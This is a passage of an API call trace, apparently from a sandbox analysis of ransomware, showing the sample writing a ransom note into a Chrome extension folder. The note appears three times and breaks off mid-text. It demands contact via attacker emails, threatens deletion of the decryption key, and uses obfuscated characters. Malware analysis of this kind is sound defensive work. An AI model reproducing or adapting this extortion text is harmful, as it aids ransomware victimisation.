lpUsedDefaultChar=0x0) returned 8717 [0297.160] WriteFile (in: hFile=0x2cc, lpBuffer=0x23731c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x23731c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.160] CloseHandle (hObject=0x2cc) returned 1 [0297.161] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\#readme_eman#.rtf")) returned 0xffffffff [0297.161] GetLastError () returned 0x2 [0297.161] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0297.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245d7a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd 